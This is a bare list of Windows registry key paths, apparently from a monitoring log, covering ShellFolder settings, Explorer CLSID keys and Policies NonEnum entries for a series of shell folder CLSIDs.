HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_CLASSES_ROOT\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_CLASSES_ROOT\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{031E4825-7B94-4DC3-B131-E946B44C8DD5}
HKEY_CLASSES_ROOT\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{04731B67-D933-450A-90E6-4ACD2E9408FE}
HKEY_CLASSES_ROOT\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_CLASSES_ROOT\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_CLASSES_ROOT\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
HKEY_CLASSES_ROOT\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{4336A54D-038B-4685-AB02-99BB52D3FB8B}
HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORPARSING
